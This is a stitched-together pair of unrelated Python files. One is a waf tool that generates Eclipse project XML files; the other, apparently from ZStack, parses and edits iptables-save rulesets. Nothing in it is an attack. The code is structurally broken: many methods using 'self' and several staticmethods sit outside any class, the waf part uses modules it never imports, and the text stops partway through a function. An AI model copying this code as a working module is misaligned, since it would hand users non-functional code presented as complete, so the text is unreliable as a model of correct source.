from xml.dom.minidom import Document
# Include directories every toolchain is assumed to search.
STANDARD_INCLUDES = [ '/usr/local/include', '/usr/include' ]

# Eclipse CDT plugin-id prefixes used throughout the generated XML.
oe_cdt = 'org.eclipse.cdt'
cdt_mk = oe_cdt + '.make.core'
cdt_core = oe_cdt + '.core'
cdt_bld = oe_cdt + '.build.core'

# Location and name of the external-tool builder launcher that calls
# waf for non-CDT (Java/Python-only) projects.
extbuilder_dir = '.externalToolBuilders'
extbuilder_name = 'Waf_Builder.launch'
class eclipse(Build.BuildContext):
    """'waf eclipse' command: generate Eclipse project description files."""
    cmd = 'eclipse'
    fun = Scripting.default_cmd

    def execute(self):
        """
        Entry point
        """
        self.restore()
        if not self.all_envs:
            self.load_envs()
        self.recurse([self.run_dir])
        # Project name: APPNAME from the wscript, else the source dir name.
        appname = getattr(Context.g_module, Context.APPNAME, os.path.basename(self.srcnode.abspath()))
        self.create_cproject(appname, pythonpath=self.env['ECLIPSE_PYTHON_PATH'])

    # Helper to dump the XML document content to XML with UTF-8 encoding
    def write_conf_to_xml(self, filename, document):
        self.srcnode.make_node(filename).write(document.toprettyxml(encoding='UTF-8'), flags='wb')
def create_cproject(self, appname, workspace_includes=None, pythonpath=None):
    """
    Create the Eclipse CDT .project and .cproject files

    @param appname The name that will appear in the Project Explorer
    @param build The BuildContext object to extract includes from
    @param workspace_includes Optional project includes to prevent
           "Unresolved Inclusion" errors in the Eclipse editor
    @param pythonpath Optional project specific python paths
    """
    # Bug fix: these parameters used mutable list defaults ([]) and are
    # appended to below, so entries leaked from one invocation into the
    # next. Use the None-sentinel idiom instead (backward compatible).
    if workspace_includes is None:
        workspace_includes = []
    if pythonpath is None:
        pythonpath = []
    hasc = hasjava = haspython = False
    source_dirs = []
    cpppath = self.env['CPPPATH']
    javasrcpath = []
    javalibpath = []
    includes = STANDARD_INCLUDES
    if sys.platform != 'win32':
        cc = self.env.CC or self.env.CXX
        if cc:
            # Ask the compiler for its real default include search path.
            cmd = cc + ['-xc++', '-E', '-Wp,-v', '-']
            try:
                gccout = self.cmd_and_log(cmd, output=Context.STDERR, quiet=Context.BOTH, input='\n'.encode()).splitlines()
            except Errors.WafError:
                pass
            else:
                includes = []
                for ipath in gccout:
                    if ipath.startswith(' /'):
                        includes.append(ipath[1:])
    cpppath += includes
    Logs.warn('Generating Eclipse CDT project files')
    for g in self.groups:
        for tg in g:
            if not isinstance(tg, TaskGen.task_gen):
                continue
            tg.post()
            # Add local Python modules paths to configuration so object resolving will work in IDE
            # This may also contain generated files (ie. pyqt5 or protoc) that get picked from build
            if 'py' in tg.features:
                pypath = tg.path.relpath()
                py_installfrom = getattr(tg, 'install_from', None)
                if isinstance(py_installfrom, Node.Node):
                    pypath = py_installfrom.path_from(self.root.make_node(self.top_dir))
                if pypath not in pythonpath:
                    pythonpath.append(pypath)
                haspython = True
            # Add Java source directories so object resolving works in IDE
            # This may also contain generated files (ie. protoc) that get picked from build
            if 'javac' in tg.features:
                java_src = tg.path.relpath()
                java_srcdir = getattr(tg.javac_task, 'srcdir', None)
                if java_srcdir:
                    if isinstance(java_srcdir, Node.Node):
                        java_srcdir = [java_srcdir]
                    for x in Utils.to_list(java_srcdir):
                        x = x.path_from(self.root.make_node(self.top_dir))
                        if x not in javasrcpath:
                            javasrcpath.append(x)
                else:
                    if java_src not in javasrcpath:
                        javasrcpath.append(java_src)
                hasjava = True
                # Check if there are external dependencies and add them as external jar so they will be resolved by Eclipse
                usedlibs = getattr(tg, 'use', [])
                for x in Utils.to_list(usedlibs):
                    for cl in Utils.to_list(tg.env['CLASSPATH_' + x]):
                        if cl not in javalibpath:
                            javalibpath.append(cl)
            if not getattr(tg, 'link_task', None):
                continue
            features = Utils.to_list(getattr(tg, 'features', ''))
            is_cc = 'c' in features or 'cxx' in features
            incnodes = tg.to_incnodes(tg.to_list(getattr(tg, 'includes', [])) + tg.env['INCLUDES'])
            for p in incnodes:
                path = p.path_from(self.srcnode)
                # Absolute paths become raw include paths; relative ones
                # become workspace-relative includes.
                if (path.startswith("/")):
                    cpppath.append(path)
                else:
                    workspace_includes.append(path)
                if is_cc and path not in source_dirs:
                    source_dirs.append(path)
                hasc = True
    waf_executable = os.path.abspath(sys.argv[0])
    project = self.impl_create_project(sys.executable, appname, hasc, hasjava, haspython, waf_executable)
    self.write_conf_to_xml('.project', project)
    if hasc:
        project = self.impl_create_cproject(sys.executable, waf_executable, appname, workspace_includes, cpppath, source_dirs)
        self.write_conf_to_xml('.cproject', project)
    if haspython:
        project = self.impl_create_pydevproject(sys.path, pythonpath)
        self.write_conf_to_xml('.pydevproject', project)
    if hasjava:
        project = self.impl_create_javaproject(javasrcpath, javalibpath)
        self.write_conf_to_xml('.classpath', project)
def impl_create_project(self, executable, appname, hasc, hasjava, haspython, waf_executable):
    """Build the in-memory XML document for the Eclipse .project file.

    For CDT (C/C++) projects the CDT managed builder is used; for
    Java/Python-only projects an external-tool builder launching waf is
    generated and written to .externalToolBuilders/Waf_Builder.launch.
    """
    doc = Document()
    projectDescription = doc.createElement('projectDescription')
    self.add(doc, projectDescription, 'name', appname)
    self.add(doc, projectDescription, 'comment')
    self.add(doc, projectDescription, 'projects')
    buildSpec = self.add(doc, projectDescription, 'buildSpec')
    buildCommand = self.add(doc, buildSpec, 'buildCommand')
    self.add(doc, buildCommand, 'triggers', 'clean,full,incremental,')
    arguments = self.add(doc, buildCommand, 'arguments')
    dictionaries = {}
    # If CDT is present, instruct this one to call waf as it is more flexible (separate build/clean ...)
    if hasc:
        self.add(doc, buildCommand, 'name', oe_cdt + '.managedbuilder.core.genmakebuilder')
        # the default make-style targets are overwritten by the .cproject values
        dictionaries = {
            cdt_mk + '.contents': cdt_mk + '.activeConfigSettings',
            cdt_mk + '.enableAutoBuild': 'false',
            cdt_mk + '.enableCleanBuild': 'true',
            cdt_mk + '.enableFullBuild': 'true',
        }
    else:
        # Otherwise for Java/Python an external builder tool is created that will call waf build
        self.add(doc, buildCommand, 'name', 'org.eclipse.ui.externaltools.ExternalToolBuilder')
        dictionaries = {
            'LaunchConfigHandle': '<project>/%s/%s'%(extbuilder_dir, extbuilder_name),
        }
        # The definition is in a separate directory XML file
        try:
            os.mkdir(extbuilder_dir)
        except OSError:
            pass # Ignore error if already exists
        # Populate here the external builder XML calling waf.
        # Bug fix: these elements used to be created from 'doc' (the
        # .project document) while being appended to 'builder' -- create
        # them from 'builder' so every node belongs to the document it
        # is serialized from.
        builder = Document()
        launchConfiguration = builder.createElement('launchConfiguration')
        launchConfiguration.setAttribute('type', 'org.eclipse.ui.externaltools.ProgramBuilderLaunchConfigurationType')
        self.add(builder, launchConfiguration, 'booleanAttribute', {'key': 'org.eclipse.debug.ui.ATTR_LAUNCH_IN_BACKGROUND', 'value': 'false'})
        self.add(builder, launchConfiguration, 'booleanAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_TRIGGERS_CONFIGURED', 'value': 'true'})
        self.add(builder, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_LOCATION', 'value': waf_executable})
        self.add(builder, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_RUN_BUILD_KINDS', 'value': 'full,incremental,'})
        self.add(builder, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_TOOL_ARGUMENTS', 'value': 'build'})
        self.add(builder, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_WORKING_DIRECTORY', 'value': '${project_loc}'})
        builder.appendChild(launchConfiguration)
        # And write the XML to the file references before
        self.write_conf_to_xml('%s%s%s'%(extbuilder_dir, os.path.sep, extbuilder_name), builder)
    for k, v in dictionaries.items():
        self.addDictionary(doc, arguments, k, v)
    natures = self.add(doc, projectDescription, 'natures')
    if hasc:
        nature_list = """
            core.ccnature
            managedbuilder.core.ScannerConfigNature
            managedbuilder.core.managedBuildNature
            core.cnature
        """.split()
        for n in nature_list:
            self.add(doc, natures, 'nature', oe_cdt + '.' + n)
    if haspython:
        self.add(doc, natures, 'nature', 'org.python.pydev.pythonNature')
    if hasjava:
        self.add(doc, natures, 'nature', 'org.eclipse.jdt.core.javanature')
    doc.appendChild(projectDescription)
    return doc
def impl_create_cproject(self, executable, waf_executable, appname, workspace_includes, cpppath, source_dirs=[]):
    """Build the in-memory XML document for the Eclipse CDT .cproject file."""
    doc = Document()
    doc.appendChild(doc.createProcessingInstruction('fileVersion', '4.0.0'))
    cconf_id = cdt_core + '.default.config.1'
    cproject = doc.createElement('cproject')
    storageModule = self.add(doc, cproject, 'storageModule',
                             {'moduleId': cdt_core + '.settings'})
    cconf = self.add(doc, storageModule, 'cconfiguration', {'id':cconf_id})
    storageModule = self.add(doc, cconf, 'storageModule',
                             {'buildSystemId': oe_cdt + '.managedbuilder.core.configurationDataProvider',
                              'id': cconf_id,
                              'moduleId': cdt_core + '.settings',
                              'name': 'Default'})
    self.add(doc, storageModule, 'externalSettings')
    # Standard CDT binary and error parsers.
    extensions = self.add(doc, storageModule, 'extensions')
    extension_list = """
        VCErrorParser
        MakeErrorParser
        GCCErrorParser
        GASErrorParser
        GLDErrorParser
    """.split()
    self.add(doc, extensions, 'extension', {'id': cdt_core + '.ELF', 'point':cdt_core + '.BinaryParser'})
    for e in extension_list:
        self.add(doc, extensions, 'extension', {'id': cdt_core + '.' + e, 'point':cdt_core + '.ErrorParser'})
    storageModule = self.add(doc, cconf, 'storageModule',
                             {'moduleId': 'cdtBuildSystem', 'version': '4.0.0'})
    config = self.add(doc, storageModule, 'configuration',
                      {'artifactName': appname,
                       'id': cconf_id,
                       'name': 'Default',
                       'parent': cdt_bld + '.prefbase.cfg'})
    folderInfo = self.add(doc, config, 'folderInfo',
                          {'id': cconf_id+'.', 'name': '/', 'resourcePath': ''})
    toolChain = self.add(doc, folderInfo, 'toolChain',
                         {'id': cdt_bld + '.prefbase.toolchain.1',
                          'name': 'No ToolChain',
                          'resourceTypeBasedDiscovery': 'false',
                          'superClass': cdt_bld + '.prefbase.toolchain'})
    self.add(doc, toolChain, 'targetPlatform', {'binaryParser': 'org.eclipse.cdt.core.ELF', 'id': cdt_bld + '.prefbase.toolchain.1', 'name': ''})
    # Delegate every build/clean to the waf script itself.
    waf_build = '"%s" %s'%(waf_executable, eclipse.fun)
    waf_clean = '"%s" clean'%(waf_executable)
    self.add(doc, toolChain, 'builder',
             {'autoBuildTarget': waf_build,
              'command': executable,
              'enableAutoBuild': 'false',
              'cleanBuildTarget': waf_clean,
              'enableIncrementalBuild': 'true',
              'id': cdt_bld + '.settings.default.builder.1',
              'incrementalBuildTarget': waf_build,
              'managedBuildOn': 'false',
              'name': 'Gnu Make Builder',
              'superClass': cdt_bld + '.settings.default.builder'})
    tool_index = 1;
    for tool_name in ("Assembly", "GNU C++", "GNU C"):
        tool = self.add(doc, toolChain, 'tool',
                        {'id': cdt_bld + '.settings.holder.' + str(tool_index),
                         'name': tool_name,
                         'superClass': cdt_bld + '.settings.holder'})
        if cpppath or workspace_includes:
            # Declare include paths per tool so the indexer can resolve headers.
            incpaths = cdt_bld + '.settings.holder.incpaths'
            option = self.add(doc, tool, 'option',
                              {'id': incpaths + '.' + str(tool_index),
                               'name': 'Include Paths',
                               'superClass': incpaths,
                               'valueType': 'includePath'})
            for i in workspace_includes:
                self.add(doc, option, 'listOptionValue',
                         {'builtIn': 'false',
                          'value': '"${workspace_loc:/%s/%s}"'%(appname, i)})
            for i in cpppath:
                self.add(doc, option, 'listOptionValue',
                         {'builtIn': 'false',
                          'value': '"%s"'%(i)})
        if tool_name == "GNU C++" or tool_name == "GNU C":
            self.add(doc,tool,'inputType',{ 'id':'org.eclipse.cdt.build.core.settings.holder.inType.' + str(tool_index), \
                'languageId':'org.eclipse.cdt.core.gcc' if tool_name == "GNU C" else 'org.eclipse.cdt.core.g++','languageName':tool_name, \
                'sourceContentType':'org.eclipse.cdt.core.cSource,org.eclipse.cdt.core.cHeader', \
                'superClass':'org.eclipse.cdt.build.core.settings.holder.inType' })
        tool_index += 1
    if source_dirs:
        sourceEntries = self.add(doc, config, 'sourceEntries')
        for i in source_dirs:
            # Each source dir is listed once as an exclusion on the
            # project root and once as its own source entry.
            self.add(doc, sourceEntries, 'entry',
                     {'excluding': i,
                      'flags': 'VALUE_WORKSPACE_PATH|RESOLVED',
                      'kind': 'sourcePath',
                      'name': ''})
            self.add(doc, sourceEntries, 'entry',
                     {
                      'flags': 'VALUE_WORKSPACE_PATH|RESOLVED',
                      'kind': 'sourcePath',
                      'name': i})
    storageModule = self.add(doc, cconf, 'storageModule',
                             {'moduleId': cdt_mk + '.buildtargets'})
    buildTargets = self.add(doc, storageModule, 'buildTargets')
    def addTargetWrap(name, runAll):
        return self.addTarget(doc, buildTargets, executable, name,
                              '"%s" %s'%(waf_executable, name), runAll)
    addTargetWrap('configure', True)
    addTargetWrap('dist', False)
    addTargetWrap('install', False)
    addTargetWrap('check', False)
    storageModule = self.add(doc, cproject, 'storageModule',
                             {'moduleId': 'cdtBuildSystem',
                              'version': '4.0.0'})
    self.add(doc, storageModule, 'project', {'id': '%s.null.1'%appname, 'name': appname})
    doc.appendChild(cproject)
    return doc
def impl_create_pydevproject(self, system_path, user_path):
    """Build the in-memory XML document for the pydev .pydevproject file."""
    doc = Document()
    doc.appendChild(doc.createProcessingInstruction('eclipse-pydev', 'version="1.0"'))
    root = doc.createElement('pydev_project')
    version_prop = self.add(doc, root,
                            'pydev_property',
                            'python %d.%d' % (sys.version_info[0], sys.version_info[1]))
    version_prop.setAttribute('name', 'org.python.pydev.PYTHON_PROJECT_VERSION')
    interp_prop = self.add(doc, root, 'pydev_property', 'Default')
    interp_prop.setAttribute('name', 'org.python.pydev.PYTHON_PROJECT_INTERPRETER')
    # Expose waf's own module paths so pydev can resolve them.
    wafadmin_paths = [entry for entry in system_path if entry.find('wafadmin') != -1]
    if wafadmin_paths:
        ext_prop = self.add(doc, root, 'pydev_pathproperty',
                            {'name':'org.python.pydev.PROJECT_EXTERNAL_SOURCE_PATH'})
        for entry in wafadmin_paths:
            self.add(doc, ext_prop, 'path', entry)
    # Project-relative python source paths.
    if user_path:
        src_prop = self.add(doc, root, 'pydev_pathproperty',
                            {'name':'org.python.pydev.PROJECT_SOURCE_PATH'})
        for entry in user_path:
            self.add(doc, src_prop, 'path', '/${PROJECT_DIR_NAME}/' + entry)
    doc.appendChild(root)
    return doc
def impl_create_javaproject(self, javasrcpath, javalibpath):
    """Build the in-memory XML document for the java .classpath file."""
    doc = Document()
    root = doc.createElement('classpath')
    # One 'src' entry per java source dir, one 'lib' entry per jar.
    for src in (javasrcpath or []):
        self.add(doc, root, 'classpathentry', {'kind': 'src', 'path': src})
    for lib in (javalibpath or []):
        self.add(doc, root, 'classpathentry', {'kind': 'lib', 'path': lib})
    self.add(doc, root, 'classpathentry', {'kind': 'con', 'path': 'org.eclipse.jdt.launching.JRE_CONTAINER'})
    # Compiled classes go to the waf build directory.
    self.add(doc, root, 'classpathentry', {'kind': 'output', 'path': self.bldnode.name })
    doc.appendChild(root)
    return doc
def addDictionary(self, doc, parent, k, v):
    """Append a <dictionary><key>k</key><value>v</value></dictionary> entry."""
    entry = self.add(doc, parent, 'dictionary')
    self.add(doc, entry, 'key', k)
    self.add(doc, entry, 'value', v)
    return entry
def addTarget(self, doc, buildTargets, executable, name, buildTarget, runAllBuilders=True):
    """Append a CDT make-target entry that runs 'waf <name>'."""
    target = self.add(doc, buildTargets, 'target',
                      {'name': name,
                       'path': '',
                       'targetID': oe_cdt + '.build.MakeTargetBuilder'})
    self.add(doc, target, 'buildCommand', executable)
    self.add(doc, target, 'buildArguments', None)
    self.add(doc, target, 'buildTarget', buildTarget)
    self.add(doc, target, 'stopOnError', 'true')
    self.add(doc, target, 'useDefaultCommand', 'false')
    self.add(doc, target, 'runAllBuilders', str(runAllBuilders).lower())
def add(self, doc, parent, tag, value = None):
    """Create <tag> under parent and return the new element.

    value may be a string (becomes a text child) or a dict (becomes
    XML attributes); falsy values add an empty element.
    """
    el = doc.createElement(tag)
    if (value):
        # isinstance is the idiomatic type test and, unlike the old
        # `type(value) == type(str())`, also accepts str subclasses.
        if isinstance(value, str):
            el.appendChild(doc.createTextNode(value))
        elif isinstance(value, dict):
            self.setAttributes(el, value)
    parent.appendChild(el)
    return el
def setAttributes(self, node, attrs):
    """Copy every key/value pair in attrs onto node as XML attributes."""
    for attr_name, attr_value in attrs.items():
        node.setAttribute(attr_name, attr_value)
|
|
'''
@author: frank
'''
import os
from zstacklib.utils import shell
from zstacklib.utils import linux
from zstacklib.utils import log
from zstacklib.utils import ordered_set
from pyparsing import *
logger = log.get_logger(__name__)
class IPTablesError(Exception):
    """Raised when parsing or applying iptables rules fails."""
class Node(object):
    """Node of a simple ordered tree used to model iptables state.

    Every node carries a human-readable ``name``, an ``identity`` string
    used for exact matching, a ``parent`` reference and an ordered list
    of ``children``.
    """

    def __init__(self):
        self.name = None
        self.identity = None
        self.parent = None
        self.children = []

    def add_child(self, node):
        """Append node as the last child and set its parent to self."""
        self.children.append(node)
        node.parent = self

    def get_child_by_name(self, name):
        """Return the first direct child with this name, else None."""
        for c in self.children:
            if c.name == name:
                return c
        return None

    def get_child_by_identity(self, identity):
        """Return the first direct child with this identity, else None."""
        for c in self.children:
            if c.identity == identity:
                return c
        return None

    def insert_child_before(self, n1, n2):
        """Insert n2 directly before the existing child n1.

        Bug fix: the previous implementation inserted at ``pos - 1``,
        which put n2 one position too early -- and, when n1 was the
        first child, ``list.insert(-1, ...)`` placed n2 near the *end*
        of the list. Inserting at ``pos`` yields [..., n2, n1, ...].
        """
        pos = self.children.index(n1)
        self.children.insert(pos, n2)
        n2.parent = self

    def insert_child_after(self, n1, n2):
        """Insert n2 directly after the existing child n1."""
        pos = self.children.index(n1)
        self.children.insert(pos + 1, n2)
        n2.parent = self

    def insert_child_all_after_by_name(self, name, node):
        """Find a node by name anywhere in the tree; insert node after it."""
        n = self.search_by_name(name)
        if not n:
            raise ValueError('cannot find node[name:%s]' % name)
        n.parent.insert_child_after(n, node)

    def insert_child_all_after_by_identity(self, identity, node):
        """Find a node by identity anywhere in the tree; insert node after it."""
        n = self.search_by_identity(identity)
        if not n:
            raise ValueError('cannot find node[identity:%s]' % identity)
        n.parent.insert_child_after(n, node)

    def insert_child_all_before_by_name(self, name, node):
        """Find a node by name anywhere in the tree; insert node before it."""
        n = self.search_by_name(name)
        if not n:
            raise ValueError('cannot find node[name:%s]' % name)
        n.parent.insert_child_before(n, node)

    def insert_child_all_before_by_identity(self, identity, node):
        """Find a node by identity anywhere in the tree; insert node before it."""
        n = self.search_by_identity(identity)
        if not n:
            raise ValueError('cannot find node[identity:%s]' % identity)
        n.parent.insert_child_before(n, node)

    def delete_child_by_name(self, name):
        """Detach the first direct child with this name, if present."""
        c = self.get_child_by_name(name)
        if c:
            self.children.remove(c)
            c.parent = None

    def delete_child_by_identity(self, identity):
        """Detach the first direct child with this identity, if present."""
        c = self.get_child_by_identity(identity)
        if c:
            self.children.remove(c)
            c.parent = None

    def walk(self, callback, data=None):
        """Depth-first walk (self first); return the first node for which
        callback(node, data) is true, else None."""
        def do_walk(node):
            if callback(node, data):
                return node
            for n in node.children:
                ret = do_walk(n)
                if ret:
                    return ret
        return do_walk(self)

    def walk_all(self, callback, data=None):
        """Depth-first walk; return every node for which callback is true."""
        ret = []
        def do_walk_all(node):
            if callback(node, data):
                ret.append(node)
            for n in node.children:
                do_walk_all(n)
        do_walk_all(self)
        return ret

    def search_by_name(self, name):
        return self.walk((lambda n, u: n.name == name), None)

    def search_by_identity(self, identity):
        return self.walk((lambda n, u: n.identity == identity), None)

    def search_all_by_name(self, name):
        return self.walk_all((lambda n, u: n.name == name), None)

    def search_all_by_identity(self, identity):
        return self.walk_all((lambda n, u: n.identity == identity), None)

    def delete_all_by_name(self, name):
        """Detach every node in the tree with this name."""
        lst = self.search_all_by_name(name)
        for l in lst:
            l.delete()

    def delete_all_by_identity(self, identity):
        """Detach every node in the tree with this identity."""
        lst = self.search_all_by_identity(identity)
        for l in lst:
            l.delete()

    def delete(self):
        """Detach this node from its parent, if it has one."""
        if self.parent:
            self.parent.children.remove(self)
            self.parent = None

    def __str__(self):
        return self.identity
class IPTableTable(Node):
    """An iptables table ('*filter', '*nat', ...); children are chains."""

    def __init__(self):
        super(IPTableTable, self).__init__()

    def __str__(self):
        # Emit the '*table' header, then every chain's counter line,
        # then the rules of each non-empty chain, closed by COMMIT.
        # (Deleted chains are gone from children, so no stale counters.)
        parts = ['%s' % self.identity]
        for chain in self.children:
            parts.append(chain.counter_str)
        for chain in self.children:
            chain_text = str(chain)
            if chain_text == '':
                continue
            parts.append(chain_text)
        parts.append('COMMIT')
        return '\n'.join(parts)
class IPTableChain(Node):
    """An iptables chain; children are IPTableRule nodes."""

    def __init__(self):
        super(IPTableChain, self).__init__()
        # The ':CHAIN POLICY [packets:bytes]' counter line for this chain.
        self.counter_str = None

    def delete_all_rules(self):
        self.children = []

    def __str__(self):
        if not self.children:
            return ''
        rules = []
        for r in self.children:
            rules.append(r)
        # Python 2 cmp-style sort combined with reverse=True: rules with
        # a higher 'order' value are emitted first.
        def sort(r1, r2):
            return r1.order - r2.order
        rules = sorted(rules, sort, reverse=True)
        # OrderedSet drops duplicate rule strings while keeping order.
        lst = ordered_set.OrderedSet()
        for r in rules:
            lst.add(str(r))
        return '\n'.join(lst)


class IPTableRule(Node):
    """A single '-A CHAIN ...' rule; 'order' influences output ordering."""

    def __init__(self):
        super(IPTableRule, self).__init__()
        self.order = 0

    def __str__(self):
        return self.identity
class IPTables(Node):
    """Parsed model of a whole iptables ruleset (iptables-save format)."""

    NAT_TABLE_NAME = 'nat'
    FILTER_TABLE_NAME = 'filter'
    MANGLE_TABLE_NAME = 'mangle'
    SECURITY_TABLE_NAME = 'security'
    RAW_TABLE_NAME = 'raw'

    def __init__(self):
        super(IPTables, self).__init__()
        self._parser = None         # lazily built pyparsing grammar
        self._current_table = None  # table being filled during parsing
        self._filter_table = None
        self._nat_table = None
        self._mangle_table = None
        self._raw_table = None
        self._security_table = None

    def get_table(self, table_name=FILTER_TABLE_NAME):
        """Return the IPTableTable with the given name, or None."""
        return self.get_child_by_name(table_name)

    def get_chain(self, chain_name, table_name=FILTER_TABLE_NAME):
        """Return the named chain from the named table, or None."""
        tbl = self.get_child_by_name(table_name)
        if not tbl:
            return None
        return tbl.get_child_by_name(chain_name)

    def _create_table_if_not_exists(self, table_name):
        # Tables are identified by their '*name' header line.
        table_name = table_name.strip()
        table_identity = '*%s' % table_name
        table = self.get_child_by_identity(table_identity)
        if not table:
            table = IPTableTable()
            table.identity = table_identity
            table.name = table_name
            table.parent = self
            self.add_child(table)
        self._current_table = table
        # Keep a direct reference per well-known table.
        if table_name == self.NAT_TABLE_NAME:
            self._nat_table = table
        elif table_name == self.FILTER_TABLE_NAME:
            self._filter_table = table
        elif table_name == self.MANGLE_TABLE_NAME:
            self._mangle_table = table
        elif table_name == self.SECURITY_TABLE_NAME:
            self._security_table = table
        elif table_name == self.RAW_TABLE_NAME:
            self._raw_table = table
        else:
            assert 0, 'unknown table name: %s' % table_name

    def _parse_table_action(self, tokens):
        # Parse action for a '*table' header line.
        table_name = tokens[1]
        self._create_table_if_not_exists(table_name)

    def _parse_commit_action(self, tokens):
        # COMMIT closes the current table section.
        self._current_table = None

    def _create_chain_if_not_exists(self, chain_name, counter_str=None):
        chain = self._current_table.get_child_by_name(chain_name)
        if not chain:
            chain = IPTableChain()
            chain.parent = self._current_table
            chain.name = chain_name
            chain.identity = chain_name
            if not counter_str:
                # Default policy/counter line for a freshly added chain.
                counter_str = ':%s - [0:0]' % chain_name
            chain.counter_str = counter_str
            self._current_table.add_child(chain)
        return chain

    def _parse_counter_action(self, tokens):
        # Parse action for a ':CHAIN POLICY [p:b]' counter line;
        # rebuilds the counter string from the parsed pieces.
        chain_name = tokens[1]
        prefix = ':%s' % chain_name
        lst = [prefix]
        lst.extend(tokens[2:])
        counter_str = ' '.join(lst)
        self._create_chain_if_not_exists(chain_name, counter_str)

    def _add_rule(self, chain_name, rule_identity, order=0):
        chain = self._create_chain_if_not_exists(chain_name)
        rule = IPTableRule()
        # Normalize whitespace so identical rules compare equal later.
        rule_identity = self._normalize_rule(rule_identity)
        rule.name = rule_identity
        rule.identity = rule_identity
        rule.parent = chain
        rule.order = order
        chain.add_child(rule)

    def _parse_rule_action(self, tokens):
        # Parse action for a '-A CHAIN ...' rule line.
        chain_name = tokens[1]
        self._add_rule(chain_name, ' '.join(tokens))

    def _construct_pyparsing(self):
        """Build (once) the per-line grammar for iptables-save output."""
        if self._parser:
            return
        # NOTE(review): Word('*') / Word('-A') match any run of those
        # characters rather than the literal token. Adequate for
        # well-formed iptables-save output, but looser than Literal.
        table = Word('*') + Word(alphas)
        table.setParseAction(self._parse_table_action)
        chain_name = Word(printables + '.-_+=%$#')
        counter = Word(':') + chain_name + restOfLine
        counter.setParseAction(self._parse_counter_action)
        comment = Word('#') + restOfLine
        rule = Word('-A') + chain_name + restOfLine
        rule.setParseAction(self._parse_rule_action)
        commit = Word('COMMIT')
        commit.setParseAction(self._parse_commit_action)
        self._parser = table | counter | comment | rule | commit
@staticmethod
def find_target_in_rule(rule):
    """Return the argument of the rule's '-j' jump, or None if absent.

    Accepts either an IPTableRule node or a plain rule string.
    """
    #TODO: find pyparsing way
    if isinstance(rule, IPTableRule):
        tokens = str(rule).split()
    else:
        tokens = rule.split()
    # The original scanned every token, but list.index() always
    # resolved to the first '-j'; keep that first-match behavior.
    if '-j' in tokens:
        return tokens[tokens.index('-j') + 1]
    return None

@staticmethod
def is_target_in_rule(rule, target):
    """True when the rule jumps to exactly the given target."""
    return target == IPTables.find_target_in_rule(rule)

@staticmethod
def find_target_chain_name_in_rule(rule):
    """Return the rule's target only when it looks like a user chain.

    Targets written entirely in upper case are assumed to be built-in
    defaults (ACCEPT, DROP, ...) and yield None.
    """
    target = IPTables.find_target_in_rule(rule)
    if target and target.isupper():
        return None
    return target
def _reset(self):
    """Drop all parsed state before re-parsing iptables-save output.

    Bug fix: the raw and security table references were previously not
    cleared here, so they could keep pointing at tables from an earlier
    parse after a reset/re-parse cycle.
    """
    self.children = []
    self._current_table = None
    self._nat_table = None
    self._filter_table = None
    self._mangle_table = None
    self._raw_table = None
    self._security_table = None
def _from_iptables_save(self, txt):
    """Re-parse the given iptables-save text into this tree."""
    self._reset()
    self._construct_pyparsing()
    for l in txt.split('\n'):
        l = l.strip('\n').strip('\r').strip('\t').strip()
        if not l:
            continue
        self._parser.parseString(l)

def iptables_save(self):
    """Load the live ruleset via /sbin/iptables-save."""
    out = shell.call('/sbin/iptables-save')
    self._from_iptables_save(out)

def __str__(self):
    lst = []
    for table in self.children:
        lst.append(str(table))
    # iptables-save needs a new line as ending
    lst.append('')
    return '\n'.join(lst)
def _cleanup_empty_chain(self):
    """Drop rule-less, untargeted user chains and rules jumping to
    chains that no longer exist."""
    def _is_chain_not_targeted(chain,table):
        # True when no rule in the table jumps ('-j') to this chain.
        need_deleted = True
        for chain2 in table.children:
            if chain2.children:
                for rule1 in chain2.children:
                    if IPTables.is_target_in_rule(rule1,chain.name):
                        need_deleted = False
                        break
        return need_deleted

    def _clean_chain_having_no_rules():
        chains_to_delete = []
        for t in self.children:
            for c in t.children:
                if not c.children:
                    if _is_chain_not_targeted(c,t):
                        chains_to_delete.append(c)
        empty_chain_names = []
        for c in chains_to_delete:
            # Never delete the built-in chains.
            if c.name in ['INPUT', 'FORWARD', 'OUTPUT', 'PREROUTING', 'POSTROUTING']:
                continue
            empty_chain_names.append(c.name)
            c.delete()
        return empty_chain_names

    def _clean_rule_having_stale_target_chain():
        alive_chain_names = []
        for t in self.children:
            for c in t.children:
                alive_chain_names.append(c.name)

        def walker(rule, data):
            if not isinstance(rule, IPTableRule):
                return False
            chain_name = self.find_target_chain_name_in_rule(rule.identity)
            if chain_name and (chain_name not in alive_chain_names):
                return True
            return False
        return self.walk_all(walker, None)

    empty_chain_names = _clean_chain_having_no_rules()
    logger.debug('removed empty chains:%s' % empty_chain_names)
    rules_to_delete = _clean_rule_having_stale_target_chain()
    for r in rules_to_delete:
        logger.debug('delete rule[%s] which has defunct target' % str(r))
        r.delete()
def _sort_chains(self, sys_chain_names, chains, sort_func):
    """Keep built-in chains first (original order); cmp-sort the rest."""
    all_chains = []
    user_chains = []
    for chain in chains:
        if chain.name in sys_chain_names:
            all_chains.append(chain)
        else:
            user_chains.append(chain)
    # Python 2 cmp-style sorted(iterable, cmp).
    user_chains = sorted(user_chains, sort_func)
    all_chains.extend(user_chains)
    return all_chains

def _sort_chain_in_filter_table(self, sort_func):
    if self._filter_table is None:
        return
    self._filter_table.children = self._sort_chains(['INPUT', 'FORWARD', 'OUTPUT'], self._filter_table.children, sort_func)

def _sort_chain_in_nat_table(self, sort_func):
    if self._nat_table is None:
        return
    self._nat_table.children = self._sort_chains(['PREROUTING', 'POSTROUTING', 'OUTPUT'], self._nat_table.children, sort_func)

def _sort_chain_in_mangle_table(self, sort_func):
    if self._mangle_table is None:
        return
    self._mangle_table.children = self._sort_chains(['PREROUTING', 'INPUT', 'FORWARD', 'OUTPUT', 'POSTROUTING'],
                                                    self._mangle_table.children, sort_func)
def cleanup_unused_chain(self, is_cleanup, table_name=FILTER_TABLE_NAME, data=None):
    """Remove every user chain of the table for which is_cleanup(chain, data)
    returns true; built-in chains are never removed."""
    table = self.get_child_by_name(table_name)
    if not table:
        return
    builtin = ['INPUT', 'FORWARD', 'OUTPUT', 'PREROUTING', 'POSTROUTING']
    # Collect names first: don't mutate table.children while iterating.
